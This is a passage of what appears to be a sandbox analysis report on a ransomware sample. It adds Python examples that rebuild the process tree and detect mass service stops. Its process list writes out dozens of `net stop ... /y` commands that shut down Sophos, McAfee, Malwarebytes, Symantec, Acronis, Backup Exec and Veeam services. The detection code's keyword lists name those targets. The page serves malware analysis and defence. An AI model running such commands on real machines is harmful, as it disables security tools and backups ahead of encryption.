N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2640 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3028 wrote to memory of 1920 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3028 wrote to memory of 1920 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3028 wrote to memory of 1920 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3028 wrote to memory of 1920 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 736 wrote to memory of 2768 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 736 wrote to memory of 2768 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 736 wrote to memory of 2768 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 736 wrote to memory of 2768 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2608 wrote to memory of 2716 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2608 wrote to memory of 2716 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2608 wrote to memory of 2716 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2608 wrote to memory of 2716 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2836 wrote to memory of 2740 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2836 wrote to memory of 2740 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2836 wrote to memory of 2740 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2836 wrote to memory of 2740 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3008 wrote to memory of 1688 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3008 wrote to memory of 1688 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3008 wrote to memory of 1688 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3008 wrote to memory of 1688 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2656 wrote to memory of 2696 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2656 wrote to memory of 2696 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2656 wrote to memory of 2696 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2656 wrote to memory of 2696 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2548 wrote to memory of 2508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2548 wrote to memory of 2508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2548 wrote to memory of 2508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2548 wrote to memory of 2508 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2640 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2640 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2524 wrote to memory of 1992 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2524 wrote to memory of 1992 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2524 wrote to memory of 1992 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2524 wrote to memory of 1992 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

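Every row in the WriteProcessMemory table above is a parent writing into a child it has just created: the sample (PID 2640) into each net.exe it launches, and each net.exe into the net1.exe helper that carries out the actual `stop`. net.exe is a Microsoft binary and shows exactly the same four writes into net1.exe, so under this sandbox these rows are what populating a freshly created child looks like, not evidence of code injection. Their value is that they encode the spawn tree, with each parent/child pair printed once per write call. The block below is an added example written for this page, not code from the report or from the sandbox vendor; it collapses the repeated rows into unique edges, finds the root, prints the tree and counts how many children of each image a process spawned. It assumes the row layout exactly as printed above, and the rows it carries are a constructed subset of that table with the report's own PIDs and image paths.

```python
import ntpath
import re
from collections import Counter

# Row layout as printed in the "Suspicious use of WriteProcessMemory" table:
# "PID <src> wrote to memory of <dst> N/A <src image> <dst image>".
ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")

# Constructed subset of the report's rows (same PIDs, same image paths).
# The sandbox prints a parent->child pair once per WriteProcessMemory call,
# so the same edge appears several times.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"
NET = r"C:\Windows\SysWOW64\net.exe"
NET1 = r"C:\Windows\SysWOW64\net1.exe"
SAMPLE_ROWS = [
    f"PID 2640 wrote to memory of 3028 N/A {SAMPLE} {NET}",
    f"PID 2640 wrote to memory of 3028 N/A {SAMPLE} {NET}",
    f"PID 3028 wrote to memory of 1920 N/A {NET} {NET1}",
    f"PID 3028 wrote to memory of 1920 N/A {NET} {NET1}",
    f"PID 2640 wrote to memory of 736 N/A {SAMPLE} {NET}",
    f"PID 736 wrote to memory of 2768 N/A {NET} {NET1}",
]


def parse_rows(rows):
    """Collapse rows into {(parent_pid, child_pid): write_count} plus a
    {pid: image_path} map. Edge insertion order is preserved so the tree
    prints in the order the sandbox observed the spawns."""
    edges = Counter()
    images = {}
    for row in rows:
        m = ROW.match(row.strip())
        if not m:
            continue  # table header or a row from another signature
        src, dst, src_img, dst_img = m.groups()
        edges[(int(src), int(dst))] += 1
        images[int(src)] = src_img
        images[int(dst)] = dst_img
    return edges, images


def roots(edges):
    """PIDs that wrote into others but were never written into: tree roots."""
    parents = {p for p, _ in edges}
    children = {c for _, c in edges}
    return sorted(parents - children)


def render_tree(edges, images, pid, depth=0):
    """Indented lines for `pid` and its descendants, one line per process."""
    lines = [f"{'  ' * depth}{pid} {images[pid]}"]
    for parent, child in edges:
        if parent == pid:
            lines.extend(render_tree(edges, images, child, depth + 1))
    return lines


def fan_out(edges, images, pid):
    """Distinct children of each image name spawned by `pid`. One parent
    with dozens of net.exe children is the mass service-stop pattern."""
    out = Counter()
    for parent, child in edges:
        if parent == pid:
            out[ntpath.basename(images[child])] += 1
    return out


if __name__ == "__main__":
    edges, images = parse_rows(SAMPLE_ROWS)
    for root in roots(edges):
        print("\n".join(render_tree(edges, images, root)))
        print("fan-out:", dict(fan_out(edges, images, root)))
```

Fed the full table rather than the subset, `fan_out` on PID 2640 gives the number of net.exe children the sample launched, which is the figure to compare against a baseline when turning this into a detection; the net.exe to net1.exe edges are always one-to-one and carry no signal of their own.
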
Uses Volume Shadow Copy service COM API

ransomware

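The process list that follows is a long run of `net stop "<service>" /y` children of the sample, each net.exe forwarding its arguments to a net1.exe child, so every targeted service appears twice. The targets fall into a few groups: endpoint security agents (Sophos, McAfee, Malwarebytes, Symantec, Trend Micro), backup products (Acronis, Backup Exec, Veeam, SQLsafe, Windows Backup), database engines (SQL Server instances, MySQL, Oracle) and Exchange or mail services; stopping the last two releases locked files so they can be encrypted, stopping the first two removes protection and recovery. The block below is an added example written for this page, not code from the report or the sandbox, that turns such command lines into a detection: it extracts the service name, buckets it with keyword heuristics, counts each net/net1 pair once and raises a verdict when one process tree stops many services across several buckets. The keyword buckets and thresholds are this example's own assumptions, and the command lines it carries are a constructed subset of the list below plus one unrelated line.

```python
import re
from collections import Counter

# Matches both forms seen in the process list: the net.exe command line
# ('net stop "X" /y') and the net1.exe one it spawns
# ('C:\Windows\system32\net1 stop "X" /y'). /y pre-answers the prompt about
# stopping dependent services, so the call never blocks on user input.
STOP_CMD = re.compile(r'\bnet1?\s+stop\s+"([^"]+)"\s*/y\b', re.IGNORECASE)

# Keyword buckets are this example's heuristics, not a vendor-maintained list.
# Case-insensitive substring match; the first bucket that matches wins.
SERVICE_CLASSES = [
    ("security", ("sophos", "swi_", "sav", "mcafee", "mcshield", "mctaskmanager",
                  "mfe", "masvc", "macmnsvc", "mbam", "mbendpoint", "sepmaster",
                  "smc", "snac", "ntrtscan", "eraser", "antivirus")),
    ("database", ("mssql", "sqlagent", "sqlbrowser", "sqlwriter", "sqltelemetry",
                  "mysql", "oracle", "msolap", "reportserver", "msdts")),
    ("backup",   ("acronis", "acrsch", "backupexec", "bedbg", "veeam", "sqlsafe",
                  "mozy", "system recovery", "sdrsvc", "vss")),
    ("mail",     ("msexchange", "imap4svc", "pop3svc", "smtpsvc")),
]

# Constructed sample: command lines copied from the process list, with the
# net/net1 pairs kept for two services and one unrelated command mixed in.
SAMPLE_CMDLINES = [
    'net stop "Acronis VSS Provider" /y',
    r'C:\Windows\system32\net1 stop "Acronis VSS Provider" /y',
    'net stop "Sophos Agent" /y',
    r'C:\Windows\system32\net1 stop "Sophos Agent" /y',
    'net stop "MSSQLSERVER" /y',
    'net stop "Veeam Backup Catalog Data Service" /y',
    'net stop "MSExchangeIS" /y',
    'net stop "McShield" /y',
    'net stop "SamSs" /y',
    'ping 127.0.0.1 -n 3',  # constructed noise line, not a service stop
]


def service_from_cmdline(cmdline):
    """Service name targeted by a `net stop ... /y` command line, else None."""
    m = STOP_CMD.search(cmdline)
    return m.group(1) if m else None


def classify(service):
    """Bucket a service name by what stopping it buys the attacker."""
    name = service.lower()
    for bucket, keywords in SERVICE_CLASSES:
        if any(k in name for k in keywords):
            return bucket
    return "other"


def stopped_services(cmdlines):
    """Distinct services targeted, in first-seen order, mapped to bucket.
    net1.exe repeats its parent's arguments, so each pair counts once."""
    seen = {}
    for cmd in cmdlines:
        svc = service_from_cmdline(cmd)
        if svc is not None and svc not in seen:
            seen[svc] = classify(svc)
    return seen


def summarize(cmdlines):
    """Number of distinct services stopped, per bucket."""
    return dict(Counter(stopped_services(cmdlines).values()))


def is_mass_service_stop(cmdlines, min_services=10, min_buckets=2):
    """True when the command lines stop at least `min_services` distinct
    services spanning at least `min_buckets` of the non-"other" buckets.
    Thresholds are illustrative; baseline them against legitimate
    maintenance scripts before deploying."""
    buckets = summarize(cmdlines)
    hits = {b: n for b, n in buckets.items() if b != "other"}
    return sum(buckets.values()) >= min_services and len(hits) >= min_buckets


if __name__ == "__main__":
    print(summarize(SAMPLE_CMDLINES))
    print("mass service stop:", is_mass_service_stop(SAMPLE_CMDLINES, min_services=5))
```

Run over the full list below, every service in the report lands in one of the four buckets or in "other", and the verdict is driven by breadth rather than by any single vendor name, which is what keeps the rule useful when the next sample swaps in a different service list.
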
Processes

C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe

"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "AcronisAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcronisAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "Antivirus" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Antivirus" /y

C:\Windows\SysWOW64\net.exe

net stop "ARSM" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ARSM" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net.exe

net stop "bedbg" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "bedbg" /y

C:\Windows\SysWOW64\net.exe

net stop "DCAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "DCAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "EPSecurityService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPSecurityService" /y

C:\Windows\SysWOW64\net.exe

net stop "EPUpdateService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPUpdateService" /y

C:\Windows\SysWOW64\net.exe

net stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net.exe

net stop "EsgShKernel" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EsgShKernel" /y

C:\Windows\SysWOW64\net.exe

net stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "IISAdmin" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IISAdmin" /y

C:\Windows\SysWOW64\net.exe

net stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "macmnsvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "macmnsvc" /y

C:\Windows\SysWOW64\net.exe

net stop "masvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "masvc" /y

C:\Windows\SysWOW64\net.exe

net stop "MBAMService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBAMService" /y

C:\Windows\SysWOW64\net.exe

net stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFramework" /y

